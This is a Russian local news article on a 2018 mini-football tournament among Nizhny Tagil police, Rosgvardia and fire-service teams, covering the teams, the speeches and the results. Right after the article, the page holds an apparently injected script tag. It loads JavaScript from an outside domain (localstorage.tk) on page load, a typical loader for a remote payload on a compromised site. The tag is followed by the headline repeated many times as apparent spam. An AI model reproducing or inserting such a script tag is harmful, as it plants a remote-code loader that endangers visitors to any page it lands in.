Вы здесь

Турнир по мини-футболу среди силовиков.

26.02.2018 12:15

Ежегодный турнир по мини-футболу среди команд правоохранительных органов Нижнего Тагила, посвященный Дню защитника Отечества, состоялся в спортивном комплексе «Металлург-Форум».
Впервые турнир среди силовиков прошел в 2007 году по инициативе нынешнего руководителя Нижнетагильского управления внутренних дел Ибрагима Абдулкадырова и ветерана Федеральной службы безопасности Анатолия Соловьева.
Известный в городе как создатель Нижнетагильского Фонда поддержки правоохранительных органов «Союз», за долгие годы работы которого многие подразделения правоохранительных органов ощутили реальную поддержку и помощь в материально-техническом оснащении и работе с кадрами, Анатолий Витальевич ушел из жизни в декабре прошлого года.
По словам представителя Общественного совета при МУ МВД России «Нижнетагильское», главного судьи соревнований Алексея Голышкина, с этого года принято проводить турнир на кубок Анатолия Соловьева.
В этом году в соревнованиях приняли участие команды Межмуниципального управления МВД России «Нижнетагильское», отдела ГИБДД Нижнего Тагила, линейного отдела внутренних дел, 12-го отряда спецназа «Урал» и ОМОН Нижнего Тагила и Екатеринбурга Управления Росгвардии, 2 –го отряда Федеральной противопожарной службы и объединения «Союз-НТ».
Приветствуя участников соревнований, начальник МУ МВД России «Нижнетагильское» полковник полиции Ибрагим Абдулкадыров выразил уверенность, что в память о замечательном человеке и руководителе, который внес значительный вклад в поддержку деятельности правоохранительных органов Нижнего Тагила, они сохранят добрые традиции, заложенные Анатолием Соловьевым.
Председатель Общественного совета Алексей Шалагинов поздравил правоохранителей с наступающим праздником защитников Отечества и пожелал упорной и честной борьбы.
Все участники турнира по мини-футболу получили дипломы и памятные подарки. По результатам состязаний лучшим бомбардиром назван представитель команды «Союз-НТ» Ильгиз Фаттахов, а лучшим вратарем- представитель команды ОСМ «Урал» Евгений Лихачев, который, по мнению судей, показал красивую игру и защиту с точки зрения профессионального мини-футбола.
Третье место в турнире заняла команда ОМОН из Екатеринбурга, вторыми стали представители линейного отдела МВД на станции Нижний Тагил. Главный кубок соревнований за первое место достался команде 2-го отряда Федеральной противопожарной службы.
Почетные гости соревнований отметили, что все участники сегодня – победители, потому что получили позитив, получили общение: «Вы – настоящие защитники Отечества!»
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.Турнир по мини-футболу среди силовиков.